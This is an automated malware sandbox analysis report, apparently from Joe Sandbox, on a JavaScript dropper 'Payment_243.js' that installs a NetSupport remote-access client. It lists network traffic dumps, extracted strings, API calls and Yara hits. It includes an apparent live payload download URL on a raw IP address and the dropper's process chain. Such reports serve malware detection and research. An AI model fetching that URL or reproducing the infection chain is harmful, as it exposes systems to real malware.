64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:25:51 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901ea419dc7059bb-IADCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSZ%2BRGP%2FBskJ7LnFLn%2BdwOJy8PAomrnw07fCdNdJ0YQbD5EIWgljEF5buCYnwlqPT%2BhhnetsEziM50DbTASpiI6M4oSMzf%2Frv6qXOTbv4t9lpKca36wLWM%2BL6M7ghXFQ93uZQZw11KSih7sn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=8053&min_rtt=8053&rtt_var=4026&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:25:52 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901ea41e5c173b74-IADCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LKEYObFWeGsbhjPcHiwLQ5zFRGBnMAimUDbPlqHud%2F6nLggXW2TDZkaH0QDok7leAQbRybrJDBESoNHc%2BZAPEz9GZdTbMBoHCZ82rfT%2BMeo9JV5oroEorvLVQi948Unz5j7mf%2Bgr4vZZtulj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=23406&min_rtt=23406&rtt_var=11703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: Payment_243.jsString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: wscript.exe, 00000000.00000003.365672076.0000000004BC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.366387222.0000000006E2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.365595144.0000000003050000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.365421348.0000000004420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.215/xxx.zip?mt=6364
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: client32.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: client32.exe, client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000002.643977444.000000000047D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.509854506.000000000047F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000004.00000003.509844776.000000000047D000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: client32.exe, 00000004.00000002.643953111.0000000000441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspe
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: client32.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t2.symcb.com0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcd.com0&
                                Source: client32.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: client32.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: client32.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: Payment_243.jsString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: client32.exe.0.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Payment_243.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
                                Source: Payment_243.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: Payment_243.jsString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: Payment_243.jsString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: Payment_243.jsString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: Payment_243.jsString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: Payment_243.jsString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: Payment_243.jsString found in binary or memory: https://momentjs.com/
                                Source: Payment_243.jsString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/cps0/
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/repository0W
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110077A0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3968, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\i99ekubc\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0

                                System Summary

                                barindex
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115EA00
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110736804_2_11073680
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11029BB04_2_11029BB0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110627B04_2_110627B0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1111C9904_2_1111C990
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110336D04_2_110336D0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110518004_2_11051800
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1115F8404_2_1115F840
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1102BD404_2_1102BD40
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101BCD04_2_1101BCD0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11087F504_2_11087F50
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11045E704_2_11045E70
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101C1104_2_1101C110
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111640E04_2_111640E0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111683454_2_11168345
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_111265B04_2_111265B0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110704304_2_11070430
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_110807404_2_11080740
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1100892B4_2_1100892B
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1101CF304_2_1101CF30
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1116EE8B4_2_1116EE8B
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CEA9804_2_69CEA980
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D149104_2_69D14910
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D139234_2_69D13923
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D138A34_2_69D138A3
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CEDBA04_2_69CEDBA0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D14DF54_2_69D14DF5
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D13DB84_2_69D13DB8
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D141564_2_69D14156
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D1A0634_2_69D1A063
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69D043C04_2_69D043C0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_69CE13104_2_69CE1310
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\i99ekubc\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: C:\ProgramData\i99ekubc\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 69CF7D00 appears 103 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11161299 appears 41 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11027F40 appears 41 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11164ED0 appears 33 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11147060 appears 588 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 1105E820 appears 312 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11081E70 appears 46 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 69CE6F50 appears 134 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 69D09480 appears 33 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 11029A70 appears 1002 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 1116FED0 appears 37 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 69CE30A0 appears 33 times
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: String function: 69CF7A90 appears 48 times
                                Source: Payment_243.jsInitial sample: Strings found which are bigger than 50
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: classification engineClassification label: mal100.rans.evad.winJS@3/26@2/3
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,4_2_1105A760
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D860
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,4_2_1109D8F0
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11116880
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11089430 FindResourceA,LoadResource,LockResource,4_2_11089430
                                Source: C:\ProgramData\i99ekubc\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\ProgramData\i99ekubc\client32.exeFile created: C:\Users\user\AppData\Local\NetSupportJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\i99ekubc\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\i99ekubc\client32.exe "C:\ProgramData\i99ekubc\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscdll.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: synceng.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wer.dllJump to behavior
